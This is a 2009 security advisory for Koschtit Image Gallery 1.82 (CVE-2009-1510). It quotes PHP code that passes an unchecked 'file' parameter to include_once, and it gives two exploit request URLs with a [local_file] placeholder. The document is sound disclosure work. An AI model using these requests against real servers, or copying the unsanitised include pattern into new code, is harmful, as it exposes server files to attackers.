Koschtit Image Gallery 1.82 Multiple Local File Inclusion Vulnerabilities

2009.05.05
Credit: Anon
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-1510
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

:local file include: ############################# script: koschtit_image_gallery(v1.82) ############################################################## download from:http://koschtit..tabere.net/download/ or http://koschtit.tabere.net/en/#getit ############################################################## vul:/ki_base/ki_makepic.php if(isset($_GET['file'])) $file = "../ki_galleries/".$_GET['file']; else exit(); $gallery = substr($_GET['file'], 0, strpos($_GET['file'], "/")); if(is_file("../ki_config/".$gallery."_ki_setup.php")) include_once("../ki_config/".$gallery."_ki_setup.php"); $imgsize = getimagesize($file); ############# vul:/ki_base/ki_nojsdisplayimage.php $gallery = substr($_GET['file'], 0, strpos($_GET['file'], "/")); include_once("../ki_config/ki_setup.php"); if(is_file(".../ki_config/".$gallery."_ki_setup.php")){ include_once("../ki_config/".$gallery."_ki_setup.php"); } . . $srcfile = "../ki_galleries/".$file; $imgsize = getimagesize("../ki_galleries/".$file); ############################################################## xpl: path/ki_base/ki_makepic.php?file=[local_file] path/ki_base/ki_nojsdisplayimage.php?file=[local_file] ------------------------------------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top